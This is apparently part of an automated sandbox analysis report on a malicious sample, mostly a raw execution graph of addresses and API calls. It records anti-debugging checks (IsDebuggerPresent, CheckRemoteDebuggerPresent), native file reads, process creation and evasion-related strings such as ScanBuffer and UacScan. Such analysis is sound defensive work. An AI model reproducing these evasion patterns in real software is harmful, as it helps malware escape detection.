35430->35431 35432 2edfe60 35431->35432 35433 2ec47ec 11 API calls 35432->35433 35434 2edfe7f 35433->35434 35435 2edfe8a 35434->35435 35436 2ed89d0 20 API calls 35435->35436 35437 2edfea3 35436->35437 35438 2edfeb3 35437->35438 35439 2edfeca 35438->35439 35440 2ed89d0 20 API calls 35439->35440 35441 2edfed6 35440->35441 35442 2edfee6 35441->35442 35443 2edfefd 35442->35443 35444 2ed89d0 20 API calls 35443->35444 35445 2edff09 35444->35445 35446 2edff30 35445->35446 35447 2ed89d0 20 API calls 35446->35447 35448 2edff3c 35447->35448 35449 2ec4860 11 API calls 35448->35449 35450 2edff5d 35449->35450 35451 2edff68 35450->35451 35452 2edff75 35451->35452 35453 2ec47ec 11 API calls 35452->35453 35454 2edff94 35453->35454 35455 2edffac 35454->35455 35456 2ed89d0 20 API calls 35455->35456 35457 2edffb8 35456->35457 35458 2ec4860 11 API calls 35457->35458 35459 2edffd9 35458->35459 35460 2edffe4 35459->35460 35461 2edfff1 35460->35461 35462 2ec47ec 11 API calls 35461->35462 35463 2ee0010 35462->35463 35464 2ee0028 35463->35464 35465 2ed89d0 20 API calls 35464->35465 35466 2ee0034 35465->35466 35467 2ee005b 35466->35467 35468 2ed89d0 20 API calls 35467->35468 35469 2ee0067 35468->35469 35470 2ed89d0 20 API calls 35469->35470 35471 2ee009a 35470->35471 35472 2ed89d0 20 API calls 35471->35472 35473 2ee00cd 35472->35473 35474 2ec4860 11 API calls 35473->35474 35475 2ee00ee 35474->35475 35476 2ec47ec 11 API calls 35475->35476 35477 2ee0125 35476->35477 35478 2ed89d0 20 API calls 35477->35478 35479 2ee0149 35478->35479 35480 2ec4860 11 API calls 35479->35480 35481 2ee016a 35480->35481 35482 2ec47ec 11 API calls 35481->35482 35483 2ee01a1 35482->35483 35484 2ed89d0 20 API calls 35483->35484 35485 2ee01c5 35484->35485 35486 2ec4860 11 API calls 35485->35486 35487 2ee01e6 35486->35487 35488 2ec47ec 11 API calls 35487->35488 35489 2ee021d 35488->35489 35490 2ed89d0 20 API calls 35489->35490 35491 2ee0241 35490->35491 35492 2ec4860 11 API calls 35491->35492 35493 2ee0262 35492->35493 
35494 2ee026d 35493->35494 35495 2ec47ec 11 API calls 35494->35495 35496 2ee0299 35495->35496 35497 2ee02a4 35496->35497 35498 2ed89d0 20 API calls 35497->35498 35499 2ee02bd 35498->35499 35500 2ee02cc 35499->35500 35501 2ee02d8 35500->35501 37715 2ede0f8 35501->37715 35504 2ec4530 11 API calls 35505 2ee0306 35504->35505 35506 2ec4860 11 API calls 35505->35506 35507 2ee0327 35506->35507 35508 2ee0332 35507->35508 35509 2ee033f 35508->35509 35510 2ec47ec 11 API calls 35509->35510 35511 2ee035e 35510->35511 35512 2ed89d0 20 API calls 35511->35512 35513 2ee0382 35512->35513 35514 2ec4860 11 API calls 35513->35514 35515 2ee03a3 35514->35515 35516 2ee03ae 35515->35516 35517 2ee03bb 35516->35517 35518 2ec47ec 11 API calls 35517->35518 35519 2ee03da 35518->35519 35520 2ed89d0 20 API calls 35519->35520 35521 2ee03fe 35520->35521 35522 2ec47ec 11 API calls 35521->35522 35523 2ee0414 35522->35523 37725 2ec7e5c 35523->37725 35526 2ee0427 35529 2ec4860 11 API calls 35526->35529 35527 2ee0534 35528 2ec4860 11 API calls 35527->35528 35530 2ee0555 35528->35530 35531 2ee0448 35529->35531 35532 2ee0560 35530->35532 35533 2ee0453 35531->35533 35534 2ec47ec 11 API calls 35532->35534 35535 2ec47ec 11 API calls 35533->35535 35536 2ee058c 35534->35536 35537 2ee047f 35535->35537 35538 2ee0597 35536->35538 35539 2ee048a 35537->35539 35540 2ed89d0 20 API calls 35538->35540 35541 2ed89d0 20 API calls 35539->35541 35542 2ee05b0 35540->35542 35543 2ee04a3 35541->35543 35544 2ec4860 11 API calls 35542->35544 35545 2ec4860 11 API calls 35543->35545 35546 2ee05d1 35544->35546 35547 2ee04c4 35545->35547 35549 2ee05e9 35546->35549 35548 2ee04cf 35547->35548 35550 2ee04dc 35548->35550 35551 2ec47ec 11 API calls 35549->35551 35552 2ec47ec 11 API calls 35550->35552 35553 2ee0608 35551->35553 35554 2ee04fb 35552->35554 35556 2ee0620 35553->35556 35555 2ee0506 35554->35555 35557 2ee0513 35555->35557 35558 2ed89d0 20 API calls 35556->35558 35559 2ed89d0 20 API calls 35557->35559 35560 2ee062c 
35558->35560 35561 2ee051f 35559->35561 35562 2ede0f8 11 API calls 35560->35562 35563 2ec4530 11 API calls 35561->35563 35564 2ee063c 35562->35564 35565 2ee052f 35563->35565 35566 2ec4530 11 API calls 35564->35566 35567 2ec4860 11 API calls 35565->35567 35566->35565 35568 2ee066d 35567->35568 35569 2ee0678 35568->35569 35570 2ec47ec 11 API calls 35569->35570 35571 2ee06a4 35570->35571 35572 2ee06af 35571->35572 35573 2ed89d0 20 API calls 35572->35573 35574 2ee06c8 35573->35574 35575 2ec4860 11 API calls 35574->35575 35576 2ee06e9 35575->35576 35577 2ee06f4 35576->35577 35578 2ec47ec 11 API calls 35577->35578 35579 2ee0720 35578->35579 35580 2ee072b 35579->35580 35581 2ed89d0 20 API calls 35580->35581 35582 2ee0744 35581->35582 37729 2ecc364 GetModuleFileNameA 35582->37729 35585 2ec4530 11 API calls 35586 2ee0761 35585->35586 35587 2ec4a00 11 API calls 35586->35587 35588 2ee0794 35587->35588 35589 2ec4860 11 API calls 35588->35589 35590 2ee07b5 35589->35590 35591 2ee07cd 35590->35591 35592 2ec47ec 11 API calls 35591->35592 35593 2ee07ec 35592->35593 35594 2ee0804 35593->35594 35595 2ed89d0 20 API calls 35594->35595 35596 2ee0810 35595->35596 35597 2ec4860 11 API calls 35596->35597 35598 2ee0831 35597->35598 35599 2ee0849 35598->35599 35600 2ec47ec 11 API calls 35599->35600 35601 2ee0868 35600->35601 35602 2ec46d4 35601->35602 35603 2ee0880 35602->35603 35604 2ed89d0 20 API calls 35603->35604 35605 2ee088c 35604->35605 35606 2ec4860 11 API calls 35605->35606 35607 2ee08ad 35606->35607 35608 2ee08c5 35607->35608 35609 2ec47ec 11 API calls 35608->35609 35610 2ee08e4 35609->35610 35611 2ec46d4 35610->35611 35612 2ee08fc 35611->35612 35613 2ed89d0 20 API calls 35612->35613 35614 2ee0908 35613->35614 35615 2ec4860 11 API calls 35614->35615 35616 2ee0929 35615->35616 35617 2ee0941 35616->35617 35618 2ec47ec 11 API calls 35617->35618 35619 2ee0960 35618->35619 35620 2ec46d4 35619->35620 35621 2ee0978 35620->35621 35622 2ed89d0 20 API calls 35621->35622 35623 2ee0984 
35622->35623 35624 2ede0f8 11 API calls 35623->35624 35625 2ee0994 35624->35625 35626 2ec4530 11 API calls 35625->35626 35627 2ee09a4 35626->35627 35628 2ec4860 11 API calls 35627->35628 35629 2ee09c5 35628->35629 35630 2ee09d0 35629->35630 35631 2ec47ec 11 API calls 35630->35631 35632 2ee09fc 35631->35632 35633 2ee0a07 35632->35633 35634 2ee0a14 35633->35634 35635 2ed89d0 20 API calls 35634->35635 35636 2ee0a20 35635->35636 35637 2ec4860 11 API calls 35636->35637 35638 2ee0a41 35637->35638 35639 2ee0a4c 35638->35639 35640 2ec47ec 11 API calls 35639->35640 35641 2ee0a78 35640->35641 35642 2ee0a83 35641->35642 35643 2ee0a90 35642->35643 35644 2ed89d0 20 API calls 35643->35644 35645 2ee0a9c 35644->35645 35646 2ec4860 11 API calls 35645->35646 35647 2ee0abd 35646->35647 35648 2ee0ac8 35647->35648 35649 2ec46d4 35648->35649 35650 2ee0ad5 35649->35650 35651 2ec47ec 11 API calls 35650->35651 35652 2ee0af4 35651->35652 35653 2ee0aff 35652->35653 35654 2ee0b0c 35653->35654 35655 2ed89d0 20 API calls 35654->35655 35656 2ee0b18 35655->35656 35657 2ec49a0 35656->35657 35658 2ee0b22 35657->35658 35659 2ee0b2f 35658->35659 35660 2ec7e5c GetFileAttributesA 35659->35660 35661 2ee0b3a 35660->35661 35662 2ee12fe 35661->35662 35663 2ee0b42 35661->35663 35664 2ec4860 11 API calls 35662->35664 35665 2ec4860 11 API calls 35663->35665 35666 2ee131f 35664->35666 35667 2ee0b63 35665->35667 35669 2ee1337 35666->35669 35668 2ee0b7b 35667->35668 35671 2ec47ec 11 API calls 35668->35671 35670 2ec47ec 11 API calls 35669->35670 35672 2ee1356 35670->35672 35673 2ee0b9a 35671->35673 35674 2ee1361 35672->35674 35675 2ee0bb2 35673->35675 35676 2ed89d0 20 API calls 35674->35676 35677 2ed89d0 20 API calls 35675->35677 35678 2ee137a 35676->35678 35679 2ee0bbe 35677->35679 35680 2ec4860 11 API calls 35678->35680 35681 2ec4860 11 API calls 35679->35681 35682 2ee139b 35680->35682 35683 2ee0bdf 35681->35683 35685 2ee13b3 35682->35685 35684 2ee0bf7 35683->35684 35686 2ec47ec 11 API calls 35684->35686 35687 
2ec47ec 11 API calls 35685->35687 35688 2ee0c16 35686->35688 35689 2ee13d2 35687->35689 35690 2ee0c2e 35688->35690 35691 2ee13dd 35689->35691 35693 2ed89d0 20 API calls 35690->35693 35692 2ed89d0 20 API calls 35691->35692 35694 2ee13f6 35692->35694 35695 2ee0c3a 35693->35695 35696 2ec4860 11 API calls 35694->35696 35697 2ec4860 11 API calls 35695->35697 35698 2ee1417 35696->35698 35699 2ee0c5b 35697->35699 35702 2ee1422 35698->35702 35700 2ec49a0 35699->35700 35701 2ee0c66 35700->35701 35703 2ec47ec 11 API calls 35701->35703 35704 2ec47ec 11 API calls 35702->35704 35705 2ee0c92 35703->35705 35706 2ee144e 35704->35706 35708 2ee0c9d 35705->35708 35707 2ec49a0 35706->35707 35709 2ee1459 35707->35709 35711 2ec46d4 35708->35711 35710 2ee1466 35709->35710 35713 2ed89d0 20 API calls 35710->35713 35712 2ee0caa 35711->35712 35714 2ed89d0 20 API calls 35712->35714 35715 2ee1472 35713->35715 35716 2ee0cb6 35714->35716 37732 2ec4de0 35715->37732 35718 2ec4de0 35716->35718 35720 2ee0cc7 35718->35720 38204 2eddd70 35720->38204 35726 2ec4530 11 API calls 35728 2ee0ce8 35726->35728 35730 2ec4860 11 API calls 35728->35730 35732 2ee0d09 35730->35732 35733 2ee0d14 35732->35733 35734 2ec46d4 35733->35734 35735 2ee0d21 35734->35735 35738 2ec47ec 11 API calls 35735->35738 35740 2ee0d40 35738->35740 35743 2ee0d4b 35740->35743 35744 2ec46d4 35743->35744 35745 2ee0d58 35744->35745 35747 2ed89d0 20 API calls 35745->35747 35749 2ee0d64 35747->35749 35751 2ec4860 11 API calls 35749->35751 35753 2ee0d85 35751->35753 35754 2ee0d90 35753->35754 35755 2ee0d9d 35754->35755 35757 2ec47ec 11 API calls 35755->35757 35759 2ee0dbc 35757->35759 35763 2ee0dc7 35759->35763 35765 2ec46d4 35763->35765 35767 2ee0dd4 35765->35767 35769 2ed89d0 20 API calls 35767->35769 35771 2ee0de0 35769->35771 35773 2ec4860 11 API calls 35771->35773 35775 2ee0e01 35773->35775 35777 2ec49a0 35775->35777 35778 2ee0e0c 35777->35778 35779 2ee0e19 35778->35779 35781 2ec47ec 11 API calls 35779->35781 35783 2ee0e38 35781->35783 
35785 2ec49a0 35783->35785 35786 2ee0e43 35785->35786 35788 2ec46d4 35786->35788 35790 2ee0e50 35788->35790 35792 2ed89d0 20 API calls 35790->35792 35794 2ee0e5c 35792->35794 35796 2ede24c 16 API calls 35794->35796 35798 2ee0e71 35796->35798 35800 2ec5818 13 API calls 35798->35800 35802 2ee0e84 35800->35802 35804 2ec4860 11 API calls 35802->35804 35806 2ee0ea5 35804->35806 35807 2ec46d4 35806->35807 35808 2ee0ebd 35807->35808 35810 2ec47ec 11 API calls 35808->35810 35812 2ee0edc 35810->35812 35814 2ec46d4 35812->35814 35816 2ee0ef4 35814->35816 35818 2ed89d0 20 API calls 35816->35818 35820 2ee0f00 35818->35820 35822 2ec4860 11 API calls 35820->35822 35823 2ee0f21 35822->35823 35825 2ee0f39 35823->35825 35826 2ec47ec 11 API calls 35825->35826 35828 2ee0f58 35826->35828 35830 2ee0f70 35828->35830 35833 2ed89d0 20 API calls 35830->35833 35835 2ee0f7c 35833->35835 35837 2ec4530 11 API calls 35835->35837 35838 2ee0f8b 35837->35838 38219 2ede1d4 35838->38219 35842 2ee0f9d 35845 2ec4860 11 API calls 35842->35845 35843 2ee2ad8 35844 2ec4860 11 API calls 35843->35844 35846 2ee2af9 35844->35846 35848 2ee0fbe 35845->35848 35849 2ee2b04 35846->35849 35851 2ee0fc9 35848->35851 35853 2ee2b11 35849->35853 35852 2ee0fd6 35851->35852 35854 2ec47ec 11 API calls 35852->35854 35855 2ec47ec 11 API calls 35853->35855 35858 2ee0ff5 35854->35858 35859 2ee2b30 35855->35859 35861 2ec49a0 35858->35861 35866 2ee2b3b 35859->35866 35863 2ee1000 35861->35863 35865 2ec46d4 35863->35865 35868 2ee100d 35865->35868 35869 2ed89d0 20 API calls 35866->35869 35871 2ed89d0 20 API calls 35868->35871 35872 2ee2b54 35869->35872 35874 2ee1019 35871->35874 35875 2ec4860 11 API calls 35872->35875 35877 2ec4860 11 API calls 35874->35877 35878 2ee2b75 35875->35878 35880 2ee103a 35877->35880 35882 2ee2b80 35878->35882 35884 2ee1045 35880->35884 35885 2ee2b8d 35882->35885 35886 2ee1052 35884->35886 35889 2ec47ec 11 API calls 35885->35889 35888 2ec47ec 11 API calls 35886->35888 35891 2ee1071 35888->35891 35892 
2ee2bac 35889->35892 35896 2ee107c 35891->35896 35897 2ee2bb7 35892->35897 35899 2ee1089 35896->35899 35901 2ed89d0 20 API calls 35897->35901 35903 2ed89d0 20 API calls 35899->35903 35904 2ee2bd0 35901->35904 35906 2ee1095 35903->35906 35907 2ec4860 11 API calls 35904->35907 35909 2ec4860 11 API calls 35906->35909 35910 2ee2bf1 35907->35910 35912 2ee10b6 35909->35912 35915 2ec46d4 35910->35915 35914 2ee10c1 35912->35914 35920 2ec47ec 11 API calls 35914->35920 35916 2ee2c09 35915->35916 35918 2ec47ec 11 API calls 35916->35918 35922 2ee2c28 35918->35922 35921 2ee10ed 35920->35921 35924 2ee10f8 35921->35924 35925 2ee2c33 35922->35925 35927 2ee1105 35924->35927 35930 2ee2c40 35925->35930 35933 2ed89d0 20 API calls 35927->35933 35931 2ed89d0 20 API calls 35930->35931 35934 2ee2c4c 35931->35934 35936 2ee1111 35933->35936 35937 2ec4860 11 API calls 35934->35937 35939 2ec4860 11 API calls 35936->35939 35940 2ee2c6d 35937->35940 35942 2ee1132 35939->35942 35945 2ee2c78 35940->35945 35944 2ec49a0 35942->35944 35947 2ee113d 35944->35947 35948 2ec47ec 11 API calls 35945->35948 35949 2ec47ec 11 API calls 35947->35949 35950 2ee2ca4 35948->35950 35952 2ee1169 35949->35952 35956 2ee2caf 35950->35956 35954 2ec49a0 35952->35954 35955 2ee1174 35954->35955 35958 2ee1181 35955->35958 35961 2ed89d0 20 API calls 35956->35961 35960 2ed89d0 20 API calls 35958->35960 35962 2ee118d 35960->35962 35963 2ee2cc8 35961->35963 35965 2ec4860 11 API calls 35962->35965 35963->35362 35966 2ee2ced 35963->35966 35968 2ee11ae 35965->35968 35969 2ec4860 11 API calls 35966->35969 35971 2ec49a0 35968->35971 35974 2ee2d0e 35969->35974 35973 2ee11b9 35971->35973 35975 2ec47ec 11 API calls 35973->35975 35976 2ee2d26 35974->35976 35978 2ee11e5 35975->35978 35979 2ec47ec 11 API calls 35976->35979 35981 2ec49a0 35978->35981 35982 2ee2d45 35979->35982 35984 2ee11f0 35981->35984 35986 2ee2d50 35982->35986 35985 2ee11fd 35984->35985 35988 2ed89d0 20 API calls 35985->35988 35990 2ee2d5d 35986->35990 35989 2ee1209 
35988->35989 35991 2ec49a0 35989->35991 35992 2ed89d0 20 API calls 35990->35992 35996 2ee1213 35991->35996 35994 2ee2d69 35992->35994 35997 2ec4860 11 API calls 35994->35997 38225 2ec4d74 35996->38225 36006 2ee2d8a 35997->36006 36011 2ec47ec 11 API calls 36006->36011 36017 2ee2dc1 36011->36017 36020 2ed89d0 20 API calls 36017->36020 36023 2ee2de5 36020->36023 36026 2ec4860 11 API calls 36023->36026 36029 2ee2e06 36026->36029 36032 2ee2e1e 36029->36032 36035 2ec47ec 11 API calls 36032->36035 36039 2ee2e3d 36035->36039 36040 2ee2e55 36039->36040 36041 2ed89d0 20 API calls 36040->36041 36043 2ee2e61 36041->36043 36045 2ec4860 11 API calls 36043->36045 36046 2ee2e82 36045->36046 36048 2ee2e8d 36046->36048 36051 2ec47ec 11 API calls 36048->36051 36053 2ee2eb9 36051->36053 36055 2ee2ec4 36053->36055 36057 2ed89d0 20 API calls 36055->36057 36059 2ee2edd 36057->36059 37734 2ec7acc 36059->37734 36068 2ec4530 11 API calls 36070 2ee2f09 36068->36070 36072 2ec4860 11 API calls 36070->36072 36074 2ee2f2a 36072->36074 36077 2ee2f35 36074->36077 36080 2ec47ec 11 API calls 36077->36080 36082 2ee2f61 36080->36082 36085 2ee2f6c 36082->36085 36087 2ee2f79 36085->36087 36088 2ed89d0 20 API calls 36087->36088 36090 2ee2f85 36088->36090 36092 2ec4860 11 API calls 36090->36092 36094 2ee2fa6 36092->36094 36096 2ee2fb1 36094->36096 36097 2ee2fbe 36096->36097 36099 2ec47ec 11 API calls 36097->36099 36101 2ee2fdd 36099->36101 36103 2ee2fe8 36101->36103 36106 2ee2ff5 36103->36106 36107 2ed89d0 20 API calls 36106->36107 36109 2ee3001 36107->36109 37747 2edf108 36109->37747 36115 2ec4530 11 API calls 36117 2ee3021 36115->36117 36119 2ec4860 11 API calls 36117->36119 36121 2ee3042 36119->36121 36124 2ee304d 36121->36124 36126 2ee305a 36124->36126 36128 2ec47ec 11 API calls 36126->36128 36131 2ee3079 36128->36131 36132 2ee3091 36131->36132 36134 2ed89d0 20 API calls 36132->36134 36136 2ee309d 36134->36136 36138 2ec4860 11 API calls 36136->36138 36140 2ee30be 36138->36140 36142 2ee30c9 
36140->36142 36143 2ee30d6 36142->36143 36145 2ec47ec 11 API calls 36143->36145 36150 2ee30f5 36145->36150 36153 2ed89d0 20 API calls 36150->36153 36155 2ee3119 36153->36155 36157 2ec4860 11 API calls 36155->36157 36160 2ee313a 36157->36160 36161 2ee3152 36160->36161 36163 2ec47ec 11 API calls 36161->36163 36165 2ee3171 36163->36165 36167 2ee317c 36165->36167 36168 2ee3189 36167->36168 36170 2ed89d0 20 API calls 36168->36170 36172 2ee3195 36170->36172 36174 2ee31a6 36172->36174 37752 2ede24c 36174->37752 36181 2ec4860 11 API calls 36182 2ee31f0 36181->36182 36184 2ee31fb 36182->36184 36185 2ee3208 36184->36185 36187 2ec47ec 11 API calls 36185->36187 36189 2ee3227 36187->36189 36192 2ee3232 36189->36192 36194 2ee323f 36192->36194 36195 2ed89d0 20 API calls 36194->36195 36196 2ee324b 36195->36196 36198 2ec4860 11 API calls 36196->36198 36200 2ee326c 36198->36200 36202 2ee3277 36200->36202 36204 2ec47ec 11 API calls 36202->36204 36206 2ee32a3 36204->36206 36209 2ee32ae 36206->36209 36212 2ed89d0 20 API calls 36209->36212 36213 2ee32c7 36212->36213 36215 2ec4860 11 API calls 36213->36215 36220 2ee32e8 36215->36220 36222 2ec47ec 11 API calls 36220->36222 36227 2ee331f 36222->36227 36229 2ed89d0 20 API calls 36227->36229 36230 2ee3343 36229->36230 36232 2ec4860 11 API calls 36230->36232 36235 2ee3364 36232->36235 36236 2ee337c 36235->36236 36238 2ec47ec 11 API calls 36236->36238 36242 2ee339b 36238->36242 36243 2ee33b3 36242->36243 36245 2ed89d0 20 API calls 36243->36245 36246 2ee33bf 36245->36246 36247 2ec4530 11 API calls 36246->36247 36249 2ee33ce 36247->36249 36250 2ec4530 11 API calls 36249->36250 36252 2ee33dd 36250->36252 36254 2ec4530 11 API calls 36252->36254 36256 2ee33ec 36254->36256 36257 2ec4530 11 API calls 36256->36257 36259 2ee33fb 36257->36259 36260 2ec4530 11 API calls 36259->36260 36262 2ee340a 36260->36262 36264 2ec4530 11 API calls 36262->36264 36266 2ee3419 36264->36266 36268 2ec4530 11 API calls 36266->36268 36270 2ee3428 36268->36270 36271 2ec4530 
11 API calls 36270->36271 36273 2ee3437 36271->36273 36274 2ec4530 11 API calls 36273->36274 36276 2ee3446 36274->36276 36278 2ec4530 11 API calls 36276->36278 36279 2ee3455 36278->36279 36280 2ec4860 11 API calls 36279->36280 36282 2ee3476 36280->36282 36284 2ee3481 36282->36284 36287 2ec47ec 11 API calls 36284->36287 36289 2ee34ad 36287->36289 36290 2ee34b8 36289->36290 36292 2ee34c5 36290->36292 36294 2ed89d0 20 API calls 36292->36294 36296 2ee34d1 36294->36296 36297 2ec4860 11 API calls 36296->36297 36298 2ee34f2 36297->36298 36300 2ee34fd 36298->36300 36303 2ec47ec 11 API calls 36300->36303 36304 2ee3529 36303->36304 36306 2ee3534 36304->36306 36309 2ee3541 36306->36309 36311 2ed89d0 20 API calls 36309->36311 36313 2ee354d 36311->36313 36314 2ee3564 36313->36314 37769 2ec7e80 36314->37769 36319 2ee370d 36321 2ec4860 11 API calls 36319->36321 36320 2ee3577 36322 2ec4860 11 API calls 36320->36322 36324 2ee372e 36321->36324 36325 2ee3598 36322->36325 36329 2ee3739 36324->36329 36330 2ee35a3 36325->36330 36332 2ec47ec 11 API calls 36329->36332 36333 2ec47ec 11 API calls 36330->36333 36334 2ee3765 36332->36334 36335 2ee35cf 36333->36335 36340 2ee3770 36334->36340 36336 2ee35da 36335->36336 36338 2ee35e7 36336->36338 36343 2ed89d0 20 API calls 36338->36343 36342 2ed89d0 20 API calls 36340->36342 36344 2ee3789 36342->36344 36345 2ee35f3 36343->36345 36346 2ec4860 11 API calls 36344->36346 36347 2ec4860 11 API calls 36345->36347 36352 2ee37aa 36346->36352 36349 2ee3614 36347->36349 36354 2ee361f 36349->36354 36355 2ec47ec 11 API calls 36352->36355 36356 2ec47ec 11 API calls 36354->36356 36361 2ee37e1 36355->36361 36358 2ee364b 36356->36358 36359 2ee3656 36358->36359 36362 2ee3663 36359->36362 36365 2ed89d0 20 API calls 36361->36365 36366 2ed89d0 20 API calls 36362->36366 36367 2ee3805 36365->36367 36368 2ee366f 36366->36368 36372 2ec4a00 11 API calls 36367->36372 36369 2ec4860 11 API calls 36368->36369 36371 2ee3690 36369->36371 36378 2ee369b 36371->36378 36374 
2ee3838 36372->36374 36375 2ec4860 11 API calls 36374->36375 36383 2ee3859 36375->36383 36379 2ec47ec 11 API calls 36378->36379 36381 2ee36c7 36379->36381 36384 2ee36d2 36381->36384 36387 2ec47ec 11 API calls 36383->36387 36388 2ee36df 36384->36388 36392 2ee3890 36387->36392 36389 2ed89d0 20 API calls 36388->36389 36390 2ee36eb 36389->36390 36396 2ee3702 36390->36396 36395 2ed89d0 20 API calls 36392->36395 36398 2ee38b4 36395->36398 38227 2ec8048 CreateDirectoryA 36396->38227 36400 2ec4860 11 API calls 36398->36400 36404 2ee38d5 36400->36404 36406 2ee38ed 36404->36406 36408 2ec47ec 11 API calls 36406->36408 36411 2ee390c 36408->36411 36413 2ee3924 36411->36413 36415 2ed89d0 20 API calls 36413->36415 36417 2ee3930 36415->36417 36418 2ec4860 11 API calls 36417->36418 36419 2ee3951 36418->36419 36421 2ee395c 36419->36421 36425 2ec47ec 11 API calls 36421->36425 36427 2ee3988 36425->36427 36429 2ee3993 36427->36429 36431 2ed89d0 20 API calls 36429->36431 36433 2ee39ac 36431->36433 36434 2ec4860 11 API calls 36433->36434 36436 2ee39cd 36434->36436 36438 2ec47ec 11 API calls 36436->36438 36442 2ee3a04 36438->36442 36444 2ed89d0 20 API calls 36442->36444 36446 2ee3a28 36444->36446 36450 2ee3a3d 36446->36450 36451 2ee5530 36446->36451 36452 2ec4860 11 API calls 36450->36452 36453 2ec4860 11 API calls 36451->36453 36458 2ee3a83 36452->36458 36454 2ee5551 36453->36454 36460 2ee555c 36454->36460 36459 2ee3a9b 36458->36459 36463 2ec7e5c GetFileAttributesA 36459->36463 36464 2ec47ec 11 API calls 36460->36464 36466 2ee3aa6 36463->36466 36467 2ee5588 36464->36467 36466->36451 36468 2ee3aae 36466->36468 36471 2ee5593 36467->36471 36469 2ec4860 11 API calls 36468->36469 36475 2ee3acf 36469->36475 36473 2ed89d0 20 API calls 36471->36473 36476 2ee55ac 36473->36476 36480 2ec47ec 11 API calls 36475->36480 36478 2ec4860 11 API calls 36476->36478 36483 2ee55cd 36478->36483 36485 2ee3b06 36480->36485 36486 2ec47ec 11 API calls 36483->36486 36488 2ed89d0 20 API calls 36485->36488 36492 
2ee5604 36486->36492 36490 2ee3b2a 36488->36490 36491 2ec4860 11 API calls 36490->36491 36497 2ee3b4b 36491->36497 36495 2ed89d0 20 API calls 36492->36495 36498 2ee5628 36495->36498 36500 2ec47ec 11 API calls 36497->36500 36499 2ec4860 11 API calls 36498->36499 36501 2ee5649 36499->36501 36507 2ee3b82 36500->36507 36502 2ee5654 36501->36502 36505 2ee5661 36502->36505 36508 2ec47ec 11 API calls 36505->36508 36511 2ed89d0 20 API calls 36507->36511 36510 2ee5680 36508->36510 36516 2ee5698 36510->36516 36513 2ee3ba6 36511->36513 36514 2ec4860 11 API calls 36513->36514 36520 2ee3bc7 36514->36520 36518 2ed89d0 20 API calls 36516->36518 36521 2ee56a4 36518->36521 36523 2ec47ec 11 API calls 36520->36523 36522 2ec4860 11 API calls 36521->36522 36524 2ee56c5 36522->36524 36531 2ee3bfe 36523->36531 36526 2ee56d0 36524->36526 36529 2ee56dd 36526->36529 36533 2ec47ec 11 API calls 36529->36533 36534 2ed89d0 20 API calls 36531->36534 36535 2ee56fc 36533->36535 36537 2ee3c22 36534->36537 36539 2ee5714 36535->36539 36538 2ec4860 11 API calls 36537->36538 36545 2ee3c43 36538->36545 36543 2ed89d0 20 API calls 36539->36543 36546 2ee5720 36543->36546 36548 2ec47ec 11 API calls 36545->36548 37778 2ede398 36546->37778 36557 2ee3c7a 36548->36557 36551 2ec4530 11 API calls 36553 2ee5746 36551->36553 36555 2ec4860 11 API calls 36553->36555 36562 2ee5767 36555->36562 36560 2ed89d0 20 API calls 36557->36560 36567 2ee3c9e 36560->36567 36564 2ec47ec 11 API calls 36562->36564 36572 2ee579e 36564->36572 38228 2ec7990 11 API calls 36567->38228 36571 2ee3cd3 36576 2ec4860 11 API calls 36571->36576 36574 2ed89d0 20 API calls 36572->36574 36577 2ee57c2 36574->36577 36582 2ee3d2a 36576->36582 36579 2ec4860 11 API calls 36577->36579 36584 2ee57e3 36579->36584 36585 2ec47ec 11 API calls 36582->36585 36587 2ec47ec 11 API calls 36584->36587 36590 2ee3d61 36585->36590 36591 2ee581a 36587->36591 36592 2ed89d0 20 API calls 36590->36592 36595 2ed89d0 20 API calls 36591->36595 36594 2ee3d85 36592->36594 36597 
[Execution graph continues. The node and edge listing that the original report renders as an interactive graph is omitted here; the API-calling nodes visible in this part of the graph are: 2ec2ef8 GetTickCount; 2edf6fa and 2edf760 GetProcAddress; 2edf774 CheckRemoteDebuggerPresent; 2ec7e5c, 2ec7e66 and 2ec7e8a GetFileAttributesA; 2ee86e0 CreateProcessAsUserW; 2ec4f20 SysAllocStringLen; 2edddaa RtlDosPathNameToNtPathName_U; 2edddc6 NtOpenFile and NtQueryInformationFile; 2edde0d NtReadFile and NtClose; 2ec4c60 SysFreeString; 2ec7de0 WriteFile; 2ed5c87 and 2ec7d5c CreateFileA; 2ed5cac and 2ed5d11 GetLastError.]
APIs
• InetIsOffline.URL(00000000,00000000,02EEB784,?,?,?,00000000,00000000), ref: 02EDF801
  • Part of subcall function 02ED89D0: FreeLibrary.KERNEL32(74F60000,00000000,00000000,00000000,00000000,02F4738C,Function_0000662C,00000004,02F4739C,02F4738C,05F5E103,00000040,02F473A0,74F60000,00000000,00000000), ref: 02ED8AAA
  • Part of subcall function 02EDF6E8: GetModuleHandleW.KERNEL32(KernelBase,?,02EDFAEB,UacInitialize,02F47380,02EEB7B8,OpenSession,02F47380,02EEB7B8,ScanBuffer,02F47380,02EEB7B8,ScanString,02F47380,02EEB7B8,Initialize), ref: 02EDF6EE
  • Part of subcall function 02EDF6E8: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02EDF700
  • Part of subcall function 02EDF744: GetModuleHandleW.KERNEL32(KernelBase), ref: 02EDF754
  • Part of subcall function 02EDF744: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02EDF766
  • Part of subcall function 02EDF744: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02EDF77D
  • Part of subcall function 02EC7E5C: GetFileAttributesA.KERNEL32(00000000,?,02EE041F,ScanString,02F47380,02EEB7B8,OpenSession,02F47380,02EEB7B8,ScanString,02F47380,02EEB7B8,UacScan,02F47380,02EEB7B8,UacInitialize), ref: 02EC7E67
  • Part of subcall function 02ECC364: GetModuleFileNameA.KERNEL32(00000000,?,00000105,0303B8B8,?,02EE0751,ScanBuffer,02F47380,02EEB7B8,OpenSession,02F47380,02EEB7B8,ScanBuffer,02F47380,02EEB7B8,OpenSession), ref: 02ECC37B
  • Part of subcall function 02EDDD70: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02EDDE40), ref: 02EDDDAB
  • Part of subcall function 02EDDD70: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02EDDE40), ref: 02EDDDDB
  • Part of subcall function 02EDDD70: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02EDDDF0
